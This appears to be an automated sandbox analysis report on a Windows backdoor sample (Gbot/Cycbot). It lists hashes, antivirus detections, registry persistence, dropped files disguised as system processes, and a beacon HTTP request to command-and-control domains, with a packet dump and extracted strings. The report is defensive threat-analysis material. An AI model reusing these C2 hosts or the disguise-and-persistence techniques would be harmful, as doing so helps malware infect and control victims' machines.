Analysis Date: 2015-01-17 20:32:43
MD5: 507cbcc845b83a05b66e315f115d7a0d
SHA1: cb932d37ab15115de69f9a55aea476dd1378e091

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386
Section: .text md5: f1400c324c4a6ed42d6e3809896b5961 sha1: 883b4d8f90a37475f936f22d7e9129e697dfa30d size: 106496
Section: .rdata md5: cd95f81b3c089a585d584b7e96c0dbe4 sha1: 589a1cb5e3eee00419c1faf5c497833330ef04c0 size: 2048
Section: .data md5: 583229f90e87586903b51e08d6b0c498 sha1: 6e513dbbb9b0129a192152669eb6a15a571e810e size: 68096
Section: .isete md5: 08dd0b80fb4964eff56f358728b68cc2 sha1: d6693b25cd6c2a72faeb8774339ff3ea192149eb size: 1024
Timestamp: 2005-10-18 12:33:58
Version: ProductVersion: 1.0.0.3
FileVersion: 1.0.0.3
PrivateBuild: 1110
PEhash: f4b074830e1347d21f964550f1fd55133dde21c2
IMPhash: ce7366088dcbc42f256e351f22de22a6
AV: 360 Safe: no_virus
AV: Ad-Aware: Gen:Trojan.Heur.KS.1
AV: Alwil (avast): Cybota [Trj]
AV: Arcabit (arcavir): Gen:Trojan.Heur.KS.1
AV: Authentium: W32/Goolbot.G.gen!Eldorado
AV: Avira (antivir): BDS/Gbot.aida
AV: BullGuard: Gen:Trojan.Heur.KS.1
AV: CA (E-Trust Ino): Win32/Diple.A!generic
AV: CAT (quickheal): Backdoor.Cycbot.B
AV: ClamAV: Trojan.Gbot-316
AV: Dr. Web: BackDoor.Gbot.21
AV: Emsisoft: Gen:Trojan.Heur.KS.1
AV: Eset (nod32): Win32/Kryptik.LZI
AV: Fortinet: W32/FraudLoad.MK!tr
AV: Frisk (f-prot): W32/Goolbot.G.gen!Eldorado
AV: F-Secure: Gen:Trojan.Heur.KS.1
AV: Grisoft (avg): Cryptic.CMZ
AV: Ikarus: Backdoor.Win32.Gbot
AV: K7: Backdoor ( 003210941 )
AV: Kaspersky: Backdoor.Win32.Gbot.aid
AV: MalwareBytes: Trojan.Agent
AV: Mcafee: BackDoor-EXI.gen.i
AV: Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV: MicroWorld (escan): Gen:Trojan.Heur.KS.1
AV: Rising: no_virus
AV: Sophos: Mal/FakeAV-IS
AV: Symantec: Backdoor.Cycbot!gen3
AV: Trend Micro: BKDR_CYCBOT.SMX
AV: VirusBlokAda (vba32): Backdoor.Gbot

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex: {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: bigmusicarchive.com
Winsock DNS: guitarvideoshool.com
Winsock DNS: 127.0.0.1
Winsock DNS: realsoftwaredevelopment.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNS: realsoftwaredevelopment.com
Type: A
104.28.8.83
DNS: realsoftwaredevelopment.com
Type: A
104.28.9.83
DNS: guitarvideoshool.com
Type: A
DNS: bigmusicarchive.com
Type: A
HTTP GET: http://realsoftwaredevelopment.com/WindowsLiveWriter/web-2_0_thumb_1.gif?v72=68&tq=gKZEtzyXj4%2FGT3azO56du%2BwjjO5ewpj02%2Bwq1d%2F6QtpmQiqLsqB5InZC7ioRV%2BY%2BhqlfnbGg16PWfZWQFsUvU2P4PB2oQSNHJcJAQ0%2BwbF39IFlpgo9ncTbtoTrKoPJ657n45PwTJ4qERNh%2FFECInmFINAPglcW92vGspUjwH5wTEYQ59qs7%2BXUyHwpRQg64KgtHorhweyRRoQ8APADnoOSSdLCGvF%2BV82lv%2B8w7VJVmGcr7DwO1tzFRX5imNyq5UZ2M0vZ40oD7lkmTigXMVu2W9iRavPGObyoIRskQE2l4NQ
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 104.28.8.83:80

Raw Pcap
0x00000000 (00000)   47455420 2f57696e 646f7773 4c697665   GET /WindowsLive
0x00000010 (00016)   57726974 65722f77 65622d32 5f305f74   Writer/web-2_0_t
0x00000020 (00032)   68756d62 5f312e67 69663f76 37323d36   humb_1.gif?v72=6
0x00000030 (00048)   38267471 3d674b5a 45747a79 586a3425   8&tq=gKZEtzyXj4%
0x00000040 (00064)   32464754 33617a4f 35366475 25324277   2FGT3azO56du%2Bw
0x00000050 (00080)   6a6a4f35 6577706a 30322532 42777131   jjO5ewpj02%2Bwq1
0x00000060 (00096)   64253246 36517470 6d516971 4c737142   d%2F6QtpmQiqLsqB
0x00000070 (00112)   35496e5a 4337696f 52562532 42592532   5InZC7ioRV%2BY%2
0x00000080 (00128)   4268716c 666e6247 67313650 57665a57   BhqlfnbGg16PWfZW
0x00000090 (00144)   51467355 76553250 34504232 6f51534e   QFsUvU2P4PB2oQSN
0x000000a0 (00160)   484a634a 41513025 32427762 46333949   HJcJAQ0%2BwbF39I
0x000000b0 (00176)   466c7067 6f396e63 5462746f 54724b6f   Flpgo9ncTbtoTrKo
0x000000c0 (00192)   504a3635 376e3435 5077544a 34714552   PJ657n45PwTJ4qER
0x000000d0 (00208)   4e682532 46464543 496e6d46 494e4150   Nh%2FFECInmFINAP
0x000000e0 (00224)   676c6357 39327647 7370556a 77483577   glcW92vGspUjwH5w
0x000000f0 (00240)   54455951 35397173 37253242 58557948   TEYQ59qs7%2BXUyH
0x00000100 (00256)   77705251 6736344b 6774486f 72687765   wpRQg64KgtHorhwe
0x00000110 (00272)   7952526f 51384150 41446e6f 4f535364   yRRoQ8APADnoOSSd
0x00000120 (00288)   4c434776 46253242 5638326c 76253242   LCGvF%2BV82lv%2B
0x00000130 (00304)   38773756 4a566d47 63723744 774f3174   8w7VJVmGcr7DwO1t
0x00000140 (00320)   7a465258 35696d4e 79713555 5a324d30   zFRX5imNyq5UZ2M0
0x00000150 (00336)   765a3430 6f44376c 6b6d5469 67584d56   vZ40oD7lkmTigXMV
0x00000160 (00352)   75325739 69526176 50474f62 796f4952   u2W9iRavPGObyoIR
0x00000170 (00368)   736b5145 326c344e 51204854 54502f31   skQE2l4NQ HTTP/1
0x00000180 (00384)   2e300d0a 436f6e6e 65637469 6f6e3a20   .0..Connection: 
0x00000190 (00400)   636c6f73 650d0a48 6f73743a 20726561   close..Host: rea
0x000001a0 (00416)   6c736f66 74776172 65646576 656c6f70   lsoftwaredevelop
0x000001b0 (00432)   6d656e74 2e636f6d 0d0a4163 63657074   ment.com..Accept
0x000001c0 (00448)   3a202a2f 2a0d0a55 7365722d 4167656e   : */*..User-Agen
0x000001d0 (00464)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x000001e0 (00480)   0d0a                                  ..


Strings
.O..
.g...8.#...
OF...Z
.#.....
<.p.
.
.HU...4Z..0k..f...0.
...
.
TgK
....2
...
.....qM..KX
0.............Q'....
.
.
.@...o}
\.E.C.
...
..
.
:

040904b0
"@0F
1.0.0.3
1110
bGB`
FileVersion
gQ R
jjjjjj
PrivateBuild
ProductVersion
qP@fa
rDas
Rr#"
S#&S
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
0mL]ne>B
>1V1&n.
1Z>s`[
2e3K<sC
2:m`S+
2V>mvwVe_
3,["f.0
3^kCWQ7aq[*
4b*?h+
4cv y9
"?|4O'
5A,\p?
)5N=)v@
63w:(Z
6*ad :
;6Ujy<
7,&bGH
7Z}olW
91hT3ADi
_94wc+
@9@`%Eh
9k8ZNJ
9l*	U`Y1I
9(zLL;N
?~AAX#
ADVAPI32.dll
ah+)v@! V:'
?AQdJW
aT'/> 
a=w{dW
{ Ayjcz"
/?bEHD
BO]|kH
#:);|C
C4b<=}&
C?'ed$
CharNextW
CharUpperW
<cNU8w
CoCreateInstance
CoInitialize
coPd-e-
CoRegisterClassObject
CoRevokeClassObject
CoTaskMemAlloc
CoTaskMemFree
CoTaskMemRealloc
CoUninitialize
C?=pzv
CreateFileMappingW
CreateStdAccessibleObject
C(TdKO|
D4sATKx
@.data
DispatchMessageW
.^D}m!
^'dM'b
d!`}nY
DpnR\=
DuI5.%
DwRA=v
;e0cM8
EI1y$E5\
EnumResourceNamesA
e@yf_5
\f$70XN
FillConsoleOutputCharacterA
FindClose
!FOs\Y
FreeEnvironmentStringsW
G?3.KmGx
g7duC(S_
GetACP
GetCPInfo
GetLastError
GetMessageW
GetModuleHandleW
GetProcessWorkingSetSize
GetTickCount
GlobalAlloc
GlobalFree
+G\oo&
Gs	k>f
H.go|D}
hl-bC##
hN4`s<
}HyK 	
If[ok,T
InitializeCriticalSection
I`P){d
ISC6/=iJ
.isete
Ivvn-G
*:`}(J
J>	F3{k
?(j;K%_}
jld6 +
JM:C5$!
j}mIV9
jxU%i<
?/^K%[
k2mqs4
KERNEL32.dll
kH#hm^
$KI);F
KillTimer
kX)\J2
lL3NonS
LockResource
LresultFromObject
lstrcmpiW
lstrcpyA
lstrcpyW
lstrlenW
M4)+~~
M4x0O<
~m:+Oz
MultiByteToWideChar
My:k?U
N33ZwH
NC	bFQJ
n^\-i[nm6
_n^Npfw
?nv(kf
}ofi:]
[OIwYE
oJgFm^
ole32.dll
OLEACC.dll
O	uhx;
OutputDebugStringW
PathCombineW
PathFileExistsW
~)PFk05
pG$],"
PiCnw\w
P;{MY&DV
PostThreadMessageW
puF)i8
`Q]5e5
q95G}q
qayz^1
q_"W }
%q}xzx
Qye6wD
'\r&0;
`.rdata
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegDeleteValueW
RegEnumKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegSetValueExW
_	s ~!
=.}[S78
SendMessageA
SetTimer
SHLWAPI.dll
S'oWCC2
SP5%Ky
Sp5QmR
StringFromCLSID
StringFromGUID2
'szeM#
t0#<D$2t
{#<t5f
!This program cannot be run in DOS mode.
T~nVSMs@
TranslateMessage
<Tv2.r
tYb~P[
.$U3KM9
uA7aYz
UnregisterClassA
USER32.dll
@U"Z^=
V3`zf47
,V?,fe;%X
v_i?p3#
VJcTJV)
[Vn/YiU
VV#Ae^03
vvt)P>=
Vx08f4}/
>W6O|0
WideCharToMultiByte
WL#M_m
wsprintfW
W\s_.Z
-/WzxP
x4firf
|XQ>~4gi
xTTyle
Y_;\6k
Y<c!a\
YH}A?kJr
Ys1LpF
@ytD^7z4
YUF3 ,
y{YTa5
zi;?}:
`ZJSSN
=zJVg,
^z\~kU@
ZKY7O=
zqcNp~
ZteCqTE}T